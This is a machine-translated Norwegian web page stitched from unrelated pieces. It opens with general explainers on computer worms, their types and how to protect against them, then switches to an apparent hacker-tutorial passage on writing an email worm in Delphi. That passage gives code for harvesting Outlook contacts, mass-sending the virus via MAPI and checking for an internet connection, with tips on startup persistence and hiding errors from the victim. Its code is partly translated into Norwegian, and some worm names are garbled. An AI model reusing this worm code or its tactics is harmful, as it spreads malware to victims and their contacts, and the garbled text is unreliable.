Internett ormer virus. Hva er dataormer? Se hva en "dataorm" er i andre ordbøker

Datavirus, skadelig programvare - alt dette er ødeleggende for operativsystemet. Hva å gjøre? Hvordan beseire hatede virusprogrammer? Nybegynnere vil si at det er nok å installere et antivirus. Men det er ikke så enkelt. Tross alt, for å beseire et virus, må du vite hvilken type det tilhører.

En av de vanligste skadelige programvarene er ormeviruset. Hvordan beskytte datamaskinen din mot penetrering av denne ubudne gjesten, og hva er han egentlig?

Hva er et "ormevirus"?

Det finnes et stort antall typer skadelig programvare. Et av de virusene det er ganske problematisk å bli kvitt etter infeksjon er "nettverksorm"-viruset. Dette er et selvreplikerende dataprogram som trenger inn i lokale og globale nettverk. Samtidig er den betydelige forskjellen mellom et vanlig virus og dette ondsinnede programmet at det andre er helt uavhengig.

Typer nettverksormer

Datavirusormer er delt inn i tre kategorier, som varierer betydelig i egenskapene deres og skaden de forårsaker på enheten.

  • Den første kategorien er e-postormer. De distribueres vanligvis i én fil via e-post. Brukeren mottar et brev fra en ukjent mottaker med vedlegg. Naturligvis, etter å bukke under for nysgjerrigheten, åpner han selv vedlegget, som allerede inneholder en nettverksorm, hvoretter infeksjonen oppstår.
  • Den andre kategorien, som er den vanligste blant skadevare, er RAM-residente ormer. Dette viruset infiserer ikke harddisker, men setter seg inn i RAM, og skader dermed kjørende programmer. For at et slikt ormevirus skal "gå hjem", er det nok å starte datamaskinen på nytt.
  • Den tredje og farligste kategorien er ormer som lagrer kode på enhetens harddisk. De brukes oftest til å forårsake en slags informasjonsskade, for eksempel for å utføre et DoS-angrep. Og her vil ikke omstart av datamaskinen løse problemet. Bare høykvalitets antivirussystemer vil hjelpe her, og selv da ikke alle. Du bør begynne å behandle den infiserte disken så tidlig som mulig, ellers må du si farvel til hele operativsystemet.

Hvordan og til hvilket formål spres nettverksormer?

Slike virus spres av hackere for å oppnå ulike mål. Noen programmer er laget for å avskjære kontrollen over enheten. Samtidig vil brukeren selv aldri legge merke til hva ormeviruset gjør. Andre bruker en infisert datamaskin som en måte å spre viruset gjennom alle tilgjengelige nettverk, både lokale og globale.

Hackere har funnet på mange forskjellige måter å spre ormen på. Oftest er det et virus som brukeren i utgangspunktet må kjøre på datamaskinen selv. Dette kan være et elektronisk vedlegg eller et miniprogram lastet ned fra Internett. Imidlertid er det også de som ikke trenger noen andres inngripen for å infisere en enhet; de trenger inn uavhengig.

Hvordan beskytte deg selv?

For å forhindre at et virus infiserer datamaskinen din, må du vite om beskyttelsestiltak. Mange vil si at ethvert antivirusprogram vil være nok, fordi det umiddelbart blokkerer virus når de kommer inn i systemet. Dette er faktisk ikke sant. Et antivirusprogram vil ikke kunne forhindre at en orm kommer inn i en enhet i tide, siden det ganske enkelt advarer om at et ondsinnet program oppdages på et bestemt nettsted. De fleste brukere legger ingen vekt på dette ved å starte eller laste ned en infisert fil til datamaskinen.

Et utmerket alternativ for beskyttelse mot denne typen programvare er proaktiv teknologi. I motsetning til konvensjonelle antivirusprogrammer, vil denne teknologien forhindre infeksjon av systemet, i stedet for å søke etter allerede kjente virus på harddisker. I dette tilfellet vil viruset bare blokkeres hvis det utgjør en reell trussel mot operativsystemet.

Nettverksorm: hvordan fjerne viruset?

Hvis skadelig programvare kommer inn på datamaskinen din, må du fjerne den umiddelbart. Men hvordan fjerne et virus uten å skade operativsystemet? I en slik situasjon vil antivirus hjelpe uerfarne brukere. Heldigvis vil det ikke ta mye tid å installere dem.

  • Kaspersky Rescue Disk- et program som lar deg rense harddisker fra virus ved å administrere systemet. For å begynne å jobbe med programmet, må du brenne en oppstartbar disk ved hjelp av et ISO-bilde. Og så er det bare å starte operativsystemet i BIOS gjennom det.
  • Kaspersky Virusfjerningsverktøy mer egnet for nybegynnere og de som ennå ikke har forstått vanskelighetene med systemet. Den søker etter skadelig programvare på datamaskinen din og fjerner den fra systemet. Den kan imidlertid ikke takle alle typer virus.

  • Dr.Web CureIt kan godt erstatte det forrige antivirusprogrammet. Dens store ulempe er at skanning av harddisker tar veldig lang tid. Noen ganger kan dette ta rundt ti timer. Selvfølgelig er en så lang skanning et tegn på at programmet nøye skanner hver fil. Det er imidlertid ikke mange som er villige til å bruke hele dagen på å søke etter ett virus.

Forebyggende tiltak

For å beskytte deg mot hackerangrep gjennom virus, er det ikke nødvendig å installere en haug med spesielle sikkerhetsprogrammer på datamaskinen. Det er nok å følge forholdsregler på nettverket, da vil ikke en eneste ondsinnet fil komme inn på enheten.

  • Hvis du mottar en viktig melding med et vedlegg på e-post, ikke skynd deg å åpne den. Først må du lagre vedlegget på disk, og deretter kjøre det med en hvilken som helst nettleser. Kanskje, i stedet for et tekstdokument eller bilde, ble en kjørbar fil mottatt på datamaskinen.
  • Under ingen omstendigheter bør du kjøre noe program som ble mottatt på e-post fra en ukjent adresse. Mest sannsynlig kom en hackerfil til enheten.
  • Selv om vedlegget kom fra en allerede kjent e-post, bør du ikke skynde deg å åpne den. Først av alt må du skanne den med et antivirusprogram. Det er mulig at e-postadressen som brevet kom fra allerede er infisert med skadelig programvare og sender nå ganske enkelt et nyhetsbrev til alle lagrede kontakter.
  • Et tegn på at det sendte vedlegget vil inneholde et virus kan være noen oppsiktsvekkende nyheter i meldingen. Dette er rett og slett et lokkemiddel for å gjøre brukeren interessert i innholdet og åpne den infiserte filen av nysgjerrighet.

En orm ligner på noen måter datavirus. Dette programmet er også i stand til gjentatt reproduksjon i PC-minnet, men det er ikke alltid i stand til å forstyrre ytelsen til utstyret. Ormen opptrer i hemmelighet og er ikke så lett å oppdage. Det gjør seg gjeldende når noen programmer eller selve operativsystemet begynner å fryse. Samtidig bruker ormen alle tilgjengelige PC-ressurser, inkludert programvare.

Vanligvis kommer en orm inn i datamaskinens minne som en enkelt applikasjon. I motsetning til virus, er ikke dette programmet knyttet til individuelle applikasjoner. Oftest kan du fange en orm via Internett.

De mest kjente virusene er ormer.

Et typisk eksempel er "Les kode". Dette er en enkel Internett-orm som infiserer datamaskiner som kjører Microsoft-programvare. Denne spesielle ormen har allerede klart å infisere mer enn 6 millioner servere rundt om i verden. En gang i minnet kan Code Read starte et angrep på en bestemt datamaskin på nettverket ved å bruke dens unike IP-adresse. Litt senere dukket det opp nye representanter for programmene til "Worm" -troppen - "Code Reed II". Dette er en mer aggressiv bror, som beholder lignende svakheter og handlingsprinsipper. Kjernen inneholder en trojaner som er i stand til å underkue operativsystemet fullstendig. (Du kan lese mer om trojaneren) Det er umulig å ikke nevne NIMDA. Koden til denne applikasjonen er en kombinasjon av en trojaner og en vanlig orm. Det er kjent for å formere seg raskt og har allerede ødelagt stemningen til mer enn 8 millioner nettverksadministratorer.

Hvordan beskytte PC-en mot virus?

Det er flere enkle regler, hvis overholdelse garanterer sikkerheten til operativsystemet:

  • Hvis du ikke er sikker på påliteligheten til portalen, gå forbi.
  • bruke mindre ulisensierte programmer.
  • Du bør ikke legge inn systemkommandoer under diktat av en ukjent "assistent".

Husk at ingen antivirus gir 100 % beskyttelse.

Det er mange flere måter å beskytte deg mot virus på; bare de enkleste og mest effektive er beskrevet her. For å hindre at viruset kommer inn på PC-en din, anbefales det å installere et antivirus og oppdatere virusdatabasen oftere.

En moderne orm kan utvikle seg og bli mer utspekulert, så du kan ikke bare stole på et antivirus. Over tid blir virus sterkere, men de kan ikke oppdages.

Andre beskyttelsesmetoder.

Windows har et innebygd beskyttelsessystem – en brannmur som kan bekjempe virtuelle ormer. I tillegg anbefaler eksperter å bruke velprøvde programmer i stedet for å laste ned alt. Klassiske virus kan nøytraliseres ved hjelp av Firewall Plus - et enkelt program som tar sikte på å bekjempe trojanere, keyloggere og andre onde ånder. Husk at World Wide Web er et favorittsted for ormer, så Ikke åpne e-poster fra ukjente personer med vedlagte filer.

Til slutt.

Et annet viktig tips. Skadelig kode er laget for å skade filer og personlige data. Derfor, Det skal alltid være en sikkerhetskopi av dataene på separate medier. Det bør huskes at de fleste ormer kommer inn på PC-en gjennom arkiver med gratis applikasjoner. Og husk at spam også kan bringe en ubuden gjest i form av en e-post med et ZIP-arkiv.

Typer ormer er forskjellige i henhold til følgende egenskaper: ved metoden for forplantning av ormen - hvordan den overfører en kopi til eksterne datamaskiner, ved metoden for å starte en kopi av ormen på den infiserte datamaskinen, ved metoden for introduksjon i system, i tillegg, av slike egenskaper som polyforisme, stealth og andre typer ondsinnet programvare (virus, trojanere).

Om e-postormer - E-post-orm

Denne kategorien ormer kjennetegnes ved at de bruker e-post for å spre seg. Ormen fungerer som følger: den sender en kopi av seg selv som et vedlegg til en e-post eller sender en lenke til filen som ligger på en av nettverksressursene, for eksempel en URL til en infisert fil som ligger på et hacket eller hackernettsted. Som et resultat, når du åpner et infisert vedlegg eller en lenke til en infisert fil, aktiveres ormekoden.

De vanligste måtene e-postormer sender infiserte meldinger på er:

  • bruk av MS Outlook-tjenester;
  • via Windows MAPI-funksjoner;
  • gjennom en direkte tilkobling til SMTP-serveren, ved å bruke e-postbiblioteket innebygd i ormekoden.

Metoder som brukes av e-postormer for å finne e-postadresser for å sende infiserte e-poster:

  • kan sende seg selv til alle adresser som finnes i MS Outlook-adresseboken og til adresser som finnes i postkassen, og noen postormer kan til og med "svare" på brev som finnes i postkassen;
  • de skanner filene som er tilgjengelige for dem på disken og markerer linjer i dem som er identifisert som e-postadresser.

I utgangspunktet bruker ormer flere av metodene ovenfor samtidig. Det finnes andre metoder for å finne "elektroniske" adresser.

Ormer som bruker Internett-meldinger - IM-Worm

Ormer av denne typen bruker den eneste spredningsmetoden: de sender seg selv til oppdagede kontakter med meldinger i kontaktlisten; disse kontaktene inneholder en URL til en fil som ligger på en av webserverne. Denne teknikken er nesten identisk med den samme distribusjonsmetoden som brukes av postormer.

IRC-Worm - ormer i IRC-kanaler

I likhet med e-postormer har denne typen ormer to metoder for spredning gjennom IRC-kanaler.

Den andre metoden: sende den infiserte filen til den uheldige brukeren. Den angrepne brukeren må i god tid bekrefte aksept av denne filen, deretter lagre den på disk og åpne (kjør).

Net-Worm - andre nettverksormer

Den første metoden er preget av det faktum at ormen prøver å finne eksterne datamaskiner, etter å ha funnet den, kopierer seg selv inn i kataloger som er åpne for lesing og skriving, hvis noen. Ormer av denne typen kan ganske enkelt krysse tilgjengelige nettverkskataloger ved å bruke operativsystemfunksjoner. Eller slike ormer vil tilfeldig søke etter datamaskiner på det globale nettverket og, ved å koble til datamaskiner, forsøke å åpne diskene deres for full tilgang.

Den andre metoden er mulig hvis det er kritiske sårbarheter i dataprogramvaren. Disse ormene søker etter slike datamaskiner og sender en spesialdesignet nettverkspakke eller forespørsel (sårbarhetsutnyttelse), og dermed trenger ormekoden inn i datamaskinen. Hvis nettverkspakken bare inneholder en del av ormens kode, lastes hovedfilen ned av den etter penetrering og startes for kjøring.

En egen kategori inkluderer ormer som bruker web- og FTP-servere for distribusjon. Infeksjonsprosessen kan deles inn i to stadier: i det første stadiet trenger ormen inn i en dataserver og modifiserer serverens tjenestefiler på en bestemt måte (som et eksempel kan statistiske nettsider nevnes). Etter det venter den på besøkende som ønsker å be om informasjon fra denne infiserte serveren, og trenger dermed gjennom andre datamaskiner på nettverket.

I utgangspunktet bruker dataormer mer enn én metode for å spre kopiene sine over nettverk (de kan ha to eller flere metoder for å angripe eksterne datamaskiner).

Ormer for fildelingsnettverk - P2P-Worm

For å infiltrere et P2P-nettverk, kopierer en slik orm seg selv til en fildelingskatalog, vanligvis plassert på den lokale maskinen. Alt annet vil på en måte skje av seg selv, siden P2P-nettverket vil ta på seg jobben med å spre viruset - ved å søke på nettverket vil det informere eksterne brukere om denne filen, og gi alt nødvendig for å laste ned filen fra den infiserte datamaskinen.

Det er også mer komplekse P2P-ormer som kan imitere nettverksprotokollen til et virkelig fildelingssystem og svare positivt på søkeforespørsler; i dette tilfellet tilbyr ormen en kopi av seg selv for nedlasting.

Den viktigste måten ormer skiller seg fra hverandre på er måten ormen sprer seg på. Andre tegn på forskjell er metodene for å lansere en kopi av ormen på den infiserte datamaskinen, metoder for introduksjon i systemet, samt polymorfisme, stealth og andre egenskaper som er iboende i andre typer ondsinnet programvare (virus og trojanere).

Typer ormer

Avhengig av måten de trenger inn i operativsystemet, er ormer delt inn i:

  • Postormer(Mail-Worm) - ormer som sprer seg i formatet til e-postmeldinger. I dette tilfellet sender ormen enten en kopi av seg selv som et vedlegg til en e-post, eller en lenke til filen som ligger på en nettverksressurs (for eksempel en URL til en infisert fil på et hacket eller hackernettsted). I det første tilfellet aktiveres ormekoden når et infisert vedlegg åpnes (lanseres), i det andre - når en lenke til en infisert fil åpnes. I begge tilfeller er effekten den samme - ormekoden er aktivert.
  • IM-ormer(IM-Worm) - ormer som bruker Internett-meldinger. Kjente dataormer av denne typen bruker den eneste metoden for forplantning - å sende meldinger til oppdagede kontakter (fra kontaktlisten) som inneholder en URL til en fil som ligger på en nettserver. Denne teknikken gjenskaper nesten fullstendig en lignende postmetode som brukes av postormer.
  • P2P-ormer(P2P-orm) - ormer som sprer seg ved hjelp av peer-to-peer fildelingsnettverk. Driftsmekanismen til de fleste av disse ormene er ganske enkel - for å infiltrere et P2P-nettverk trenger ormen bare å kopiere seg selv til en fildelingskatalog, som vanligvis er plassert på den lokale maskinen. P2P-nettverket tar seg av alt resten av arbeidet med å spre viruset - når du søker etter filer på nettverket, vil det informere eksterne brukere om denne filen og gi alle nødvendige tjenester for å laste ned filen fra den infiserte datamaskinen. Det er mer komplekse P2P-ormer som imiterer nettverksprotokollen til et spesifikt fildelingssystem og reagerer positivt på søkeforespørsler – mens ormen tilbyr en kopi av seg selv for nedlasting.
  • Ormer i IRC-kanaler(IRC-orm). Denne typen orm, som e-postormer, har to måter å spre ormen gjennom IRC-kanaler, og gjentar metodene beskrevet ovenfor. Den første innebærer å sende en URL til en kopi av ormen. Den andre metoden er å sende en infisert fil til en nettverksbruker. I dette tilfellet må den angrepne brukeren bekrefte mottak av filen, deretter lagre den på disk og åpne den (kjør den for kjøring).
  • Nettverksormer(Net-Worm) - andre nettverksormer, blant dem er det fornuftig å i tillegg skille mellom Internett-ormer og LAN-ormer
    • Internett-ormer- ormer som bruker Internett-protokoller for å spre seg. For det meste spres denne typen orm ved å bruke feil behandling av grunnleggende pakker i TCP/IP-protokollstabelen av enkelte applikasjoner.
    • LAN-ormer- ormer som sprer seg via lokale nettverksprotokoller

I dag vil jeg beskrive prinsippet for drift av et nettverksvirus for deg. Emnet, som du forstår, er veldig relevant, siden 70 % av min personlige postkasse alltid er fylt med virus av alle slag
- fra små, men onde VBS-ormer til ett og et halvt megagram verk av ungdomsskolebarn :) De vet ikke om eksistensen av WinAPI :)

For å penetrere en datamaskin kan virus enten bruke feil i brukerens programvare (VBS+Outlook=love:)) eller feil i brukerens hode. La oss se på et eksempel på et slikt viralt brev:

Emne: Morsomt
Hallo! Hold den kule vitsen som jeg lovet deg (eller ikke til deg, jeg husker ikke :)). Men behold den likevel. Ikke bekymre deg, det formaterer faktisk ingenting!
Ikke glem å sjekke, paranoid :)
Lykke til!
Legg ved: fake_format.exe

Vel, her er det: hver halt Internett-bruker sender konstant vitser til vennene sine, og husker følgelig ikke hvem han lovet hva han skulle; meldingen om "falsk formatering" bytter offerets hjerne til vitser og blind tro på antivirus
- avsluttes 🙂 La meg minne deg på at algoritmene jeg beskrev ikke bestemmes av noen webs, avp og andre jagerfly.

Kort sagt, jeg selv hadde allerede lyst til å starte denne morsomme vitsen. Jeg lanserer den :)

Feil... intel pentium 5 ikke funnet!

Å... Det ser ikke ut til å fungere? Nei, jeg gjettet ikke 🙂 Faktisk overførte viruset umiddelbart kroppen til offerets harddisk, registrerte seg for oppstart og vil nå henge i RAM (hint: i medisinsk sjargong er "RAM" OPERATIV KIRURGI, så vær forsiktig;)) ofre i henhold til prinsippet beskrevet av meg i artikkelen “Do-It-Yourself Resident Virus”. Bare det vil ikke sjekke lanseringen av filer, men tilkoblingen til Internett 🙂 (i kildekoden vil dette være IsOnline-prosedyren, så for fremtiden;)). Men samtidig
ingen hindrer deg i å overvåke lanseringen av filer
- det er fortsatt et virus, selv om det er et nettverksvirus. Derfor vil jeg inkludere InfectFile-prosedyren i logikken. Så vi vil bruke følgende funksjoner og prosedyrer:

ISONLINE - sjekker Internett-tilkobling
SENDVIRUS - gjett tre ganger 😉
GETMAILS - få adresser fra Outglitchs adressebok
INFEKTFILER - 🙂
WORKMEMORY - nesten det samme som i forrige artikkel, men med modifikasjoner.

KODING

Før selve kodingen begynner, vil det denne gangen være nødvendig med mange foreløpige kjærtegn :) Jeg skal forklare hvorfor: for å lese adresseboken vil vi få tilgang til Outlook via interprogramgrensesnittet, og til dette er det ikke ille for oss å bruke dens type bibliotek. Så gjør: prosjekt import type bibliotek, og se der... det stemmer, Outlook express v.9 eller hva du har. Den niende versjonen anses å være, om jeg ikke tar feil, fra Office2k. Importert? Hva betyr "ikke på listen"? Ok, det skjer. Søk manuelt
- i katalogen med kontoret er det en fil msoutl.olb. Dette er det 😉 Skriv nå outlook_tlb i bruksseksjonen, så får du tilgang til de mest intime stedene i adresseboken din 🙂 Å, jeg er litt opptatt i dag 😉
Generelt bør prosedyren for å sløye adresseboken se slik ut:

bruker
ComObj, outlook_tlb,
Skjemaer;
....
Prosedyre FÅ MAIL;
var
MyFolder, MSOutlook, MyNameSpace, MyItem: Variant; s:streng;
num, i: Heltall;
e-poster: array of string;

begynne
MSOutlook:= CreateOleObject("Outlook.Application");
MyNameSpace:= MSOutlook.GetNameSpace("MAPI");
MyFolder:= MyNamespace.GetDefaultFolder(olFolderContacts);
SetLength(mails,MyFilder.Items.Count);
for i:= 1 til MyFolder.Items.Count do
begynne
MyItem:= MyFolder.Items[i];
mails[i]:= minitem.email1addresses;
slutt;

Vel, likte du det jeg skrev? Jøss, det kommer bare til å bli verre. Fordi viruset vil bli sendt ved hjelp av en ren API. Og dette, som Horrific sier: "det samme som manuell sex. Det er en effekt i begge tilfeller, men det tar lang tid å oppnå det og det er ingen slik buzz" :) Vel
så hva skrev jeg her? Bruker Comobj lar oss jobbe med COM-teknologi; Deretter oppretter vi bare et OLE Outlook-objekt og får syklisk en liste over e-poster fra det. Hvis du vil finne ut noe annet
– dette er også ekte, les dokumentene – de styrer. Selv på engelsk. Listen over e-poster er skrevet til en dynamisk rekke strenger. Den vil bli brukt av SendVirus-funksjonen. Denne:

funksjon SendVirus(konst Reseptnavn, Mottaksadresse, Emne, Vedlegg: streng): Boolsk;
var
MapiMessage: TMapiMessage;
MapiFileDesc: TMapiFileDesc;
MapiRecipDesc: TMapiRecipDesc;
i:heltall;
s:streng;
begynne
med MapiRecipDesc ​​​​begynn
ulRecerved:= 0;
ulRecipClass:= MAPI_TO;
lpszName:= PChar(RecipName);
lpszAddress:= PChar(RecipAddress);
ulEIDSize:= 0;
lpEntryID:= null;
slutt;

med MapiFileDesc begynner
ulReserved:= 0;
flFlags:= 0;
nPosisjon:= 0;
lpszPathName:= PChar(vedlegg);
lpszFilnavn:= null;
lpFileType:= null;
slutt;

med MapiMessage begynner
ulReserved:= 0;
lpszSubject:= null;
lpszNoteText:= PChar(Emne);
lpszMessageType:= null;
lpszDateReceived:= null;
lpszConversationID:= null;
flFlags:= 0;
lpOriginator:= null;
nRecipCount:= 1;
lpRecips:= @MapiRecipDesc;
hvis lengde (vedlegg) > 0 så begynn
nFileCount:= 1;
lpFiles:= @MapiFileDesc;
slutt ellers begynne
nFileCount:= 0;
lpFiler:= null;
slutt;
slutt;

Resultat:= MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG
eller MAPI_LOGON_UI eller MAPI_NEW_SESSION, 0) = SUCCESS_SUCCESS;
slutt;

Hovde du opp mens du leste dette? Gå og ta en øl, ellers forstår du ingenting.
Drakk du? Jeg også 😉 Ok, la oss fortsette. Du vil bruke det slik:

For i:= 1 til lengde (poster) gjør
begynne
SendVirus("",mails[i],"pricol".");
slutt;

Vi kommer til å bruke MAPI-bruk her, så ikke glem å deklarere det. Kort sagt, dette
- arbeid på lavt nivå med post. Og for å jobbe med post, som du vet, må du ha en)
mottakerens e-post b) brevtekst c) vedlegg. Dette er hva jeg gjør:
MapiRecipDesc ​​​​- beskriv mottakeren, MapiFileDesc - vedlegg,
de. viruset vårt, MapiMessage er en melding, så sender jeg den til den store verden med MapiSendMail-kommandoen 😉 Vel, det viste seg å ikke være så vanskelig. Det viktigste er å forstå at din beste venn
- dette er ikke c:\porno, men win32.hlp :)

Hvordan kan vi nå passe all denne ordlyden inn i virusets harde logikk? Du vil finne ut av det selv, jeg har fortalt deg om dette i 2 artikler på rad. Og uansett, jeg feiret kjæresten min sin bursdag i går, og nå banker hodet litt :) Vel, ok, pliktfølelsen er sterkere. Bare gjør det:
Den første linjen er å sjekke navnet på filen der du startet fra. Hvis
pricol.exe betyr CopyFile til Windows :) Og hvis du startet fra Windows-katalogen
- sjekk deretter tilkoblingen til det verdensomspennende 😉-nettverket syklisk. Vi sjekker:

funksjon IsOnline: Boolsk;
var
RASConn: TRASConn;
dwSize,dwCount: DWORD;
begynne
RASConns.dwSize:= SizeOf(TRASConn);
dwSize:= SizeOf(RASConns);
Res:=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Resultat:= (Res = 0) og (dwCount > 0);
slutt;

Så. Hvis alt er i orden, så fortsett - rist adresseboken din og send ut posten. Det er to triks her. Hvis navnet ditt
pricol.exe - sjekk umiddelbart tilkoblingen. Brukeren kan sjekke e-post på nettet. Dette vil øke sjansene våre for å få et nyhetsbrev betraktelig. Du har allerede funnet ut det andre trikset selv,
nemlig i scenariet jeg beskrev, vil du alltid sende identiske brev til samme bruker, bare fordi han ikke ble slettet fra adresseboken. Skriv derfor ned alle behandlede adresser i en loggfil og kontroller den hele tiden. Det ser ut til å være det. Selv om nei. Ikke glem å legge ved feilutsatte kodefragmenter i try..unntatt. Og sett nøkkelen ($D-). For hvis brukeren plutselig fanger en feil som at "FUCK" ikke er en gyldig heltallsverdi, vil han mistenke noe.

KONKLUSJON

Denne siste artikkelen handler om virus som er feilsøkt for Windows 9x. Jeg har nylig formatert skruen og installert WindowsXP Professional, så følgende eksempler vil være for det. Og du kan allerede sakte kjøpe Delphi 7, siden jeg sådde sjettedelene mine et sted, og nå sitter jeg helt naken :) Jeg kommer til å kjøpe de syvendene, følgelig 😉

Den neste artikkelen vil sannsynligvis bli viet steganografi og dens praktiske implementering.